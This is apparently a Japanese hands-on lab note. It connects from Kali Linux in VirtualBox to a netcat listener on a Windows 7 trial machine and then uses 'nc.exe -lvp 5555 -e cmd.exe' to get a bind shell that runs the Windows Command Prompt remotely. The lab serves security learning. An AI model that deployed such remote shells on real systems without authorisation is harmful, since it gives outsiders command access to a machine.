Netcat 接続実験
Windows 7 試用版で
Command Prompt を開き
1 2 | cd C:Worknc.exe -lvp 5555 |
で netcat を起動
これに kaliLinux で接続できるか実験
本来はホストオンリーアダプタなどで実験するけど
設定がうまくできなかったので
ブリッジ接続で実験
IPは変動するので
Windows 側は
1 | ipconfig |
でIPアドレスを把握
IPv4 Address の部分がIPアドレスになる
今回は
192.168.1.174
次に VirtualBox で KaliLinux を起動
ctrl + Alt + t で端末を起動し
1 | nc 192.168.1.174 5555 |
で接続
すると
Windows 7 側で
1 | netstat -an |
を実行すると
5555ポートが ESTABLISHED になっていればOK
この状態で KaliLinux で hello と入力すると
Windows 側でも hello と表示される
また Windows 側で入力した
windows というメッセージも KaliLinux 側で表示される
なお Netcat を終了するには
ctrl + c でどちらかが接続を停止すると終了する
これを利用すれば
KaliLinux 側から
Windows の Command Prompt を操作することが可能
この実験をするために
Windows で Netcat をサーバとして起動させる
これには
-e オプションを使う
-e オプションで実行するプログラムを指定する
1 | nc.exe -lvp 5555 -e cmd.exe |
今回は Windows のシェルの cmd.exe を実行
これで KaliLinux で
1 | nc 192.168.1.174 5555 |
で接続すると
Windows の Command Prompt が操作できるようになる
試しに Windows のファイル一覧を表示する dir コマンドを実行
すると現在のディレクトリの
Windowsのファイル一覧を表示することができる
なお終了するときには
KaliLinux 側で
1 | exit |
を実行すればOK
なお、windows 側では
前回と異なり操作している状態が表示されない
この手法がバインドシェル
ただし、これだとファイアーウォールやルーターの影響を受ける
理由は外部から内部へのアクセスを制限しているため